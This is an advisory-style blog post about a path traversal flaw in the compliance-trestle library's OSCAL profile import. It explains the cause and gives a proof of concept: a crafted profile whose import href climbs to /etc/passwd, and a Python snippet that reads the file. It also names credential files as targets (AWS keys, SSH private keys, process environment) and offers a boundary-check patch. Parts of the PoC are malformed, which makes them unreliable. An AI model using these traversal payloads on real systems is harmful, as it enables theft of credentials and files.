Compliance Trestle, Path Traversal, CVE-2026-45774 (Moderate) -DC-May2026-17

Listen to this Post

Intro: How CVE-2026-45774 Works

The vulnerability exists in the profile import mechanism of the compliance-trestle library. The core issue arises when the library resolves `trestle://` URIs and relative file paths. It joins these paths with the `trestle_root` and calls .resolve(), but fails to perform any boundary check to ensure the resolved path stays within the intended trestle workspace. An attacker can craft a malicious OSCAL profile YAML. This YAML file includes an `imports[].href` field. The attacker populates this field with a path that contains directory traversal sequences, such as "trestle://../../etc/passwd". When a victim’s system uses the vulnerable library to import this malicious profile, the library constructs a file path. It combines the `trestle_root` with the attacker’s traversal sequence. Calling `.resolve()` then normalizes this path, effectively navigating up from the `trestle_root` to the root directory and then accessing the target file, for example, /etc/passwd. The vulnerability is present in the `LocalFetcher` class within trestle/core/remote/cache.py. Specifically, the `__init__` method for handling `trestle://` URIs and relative paths does not include a boundary check. Additionally, the `_import.py` file passes attacker-controlled `href` values directly to the fetcher without sanitization. To make matters worse, a regular expression intended to validate `trestle://` URIs was left as dead code, never actually enforced during the path resolution process.

DailyCVE Form:

Platform: compliance-trestle
Version: 4.0.2
Vulnerability: Path Traversal
Severity: Moderate
Date: 2026-05-27

Prediction: 2026-06-10

What Undercode Say:

Verify vulnerable version
pip show compliance-trestle
Exploit via PoC
cat > malicious_profile.yaml << EOF
profile:
uuid: "550e8400-e29b-41d4-a716-446655440000"
metadata:
"Malicious Profile"
version: "1.0"
last-modified: "2024-01-01T00:00:00+00:00"
oscal-version: "1.0.4"
imports:
- href: "trestle://../../../../../../etc/passwd"
EOF
Demonstrate local fetcher exploitation
python3 -c "
from pathlib import Path
from trestle.core.remote.cache import LocalFetcher
import tempfile
trestle_root = Path(tempfile.mkdtemp())
evil = LocalFetcher(trestle_root, 'trestle://../../../../../../etc/passwd')
print(f'Evil: {evil._abs_path}')
print(f'Content: {evil._abs_path.read_text().split(chr(10))[bash]}')
"

Exploit:

Attackers can leak sensitive files like /etc/passwd, /etc/shadow, and environment variables from /proc/self/environ. For example, including `trestle://../../root/.aws/credentials` or `trestle://../../root/.ssh/id_rsa` in a malicious OSCAL profile allows credential theft. Organizations that import attacker-controlled OSCAL profiles from public compliance catalogs are at risk, enabling supply chain attacks.

Protection:

Upgrade to a patched version of compliance-trestle once available, or apply the following code fix in trestle/core/remote/cache.py:

elif uri.startswith(const.TRESTLE_HREF_HEADING):
uri = str(trestle_root / uri[len(const.TRESTLE_HREF_HEADING) :])
self._abs_path = pathlib.Path(uri).resolve()
✅ ADD: Boundary check
if not self._abs_path.is_relative_to(self._trestle_root):
raise TrestleError(
f"Path traversal blocked: resolved path '{self._abs_path}' "
f"is outside trestle root '{self._trestle_root}'"
)

Additionally, the same fix must be applied to the relative path handling around line 194.

Impact

Credential Theft: Reading `~/.aws/credentials` and SSH private keys.

System Reconnaissance: Reading `/etc/passwd` and `/proc/self/environ`.

Supply Chain Attack: Publishing malicious OSCAL profiles to public catalogs.
Dead Code Evidence: The `TRESTLE_HREF_REGEX` (defined in const.py:253) was never enforced, indicating a planned but unimplemented validation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Previous

Capsule (Kubernetes multi‑tenancy framework), Subresource Webhook Bypass, CVE‑2026‑30963 (Medium) -DC-May2026-16

Scroll to Top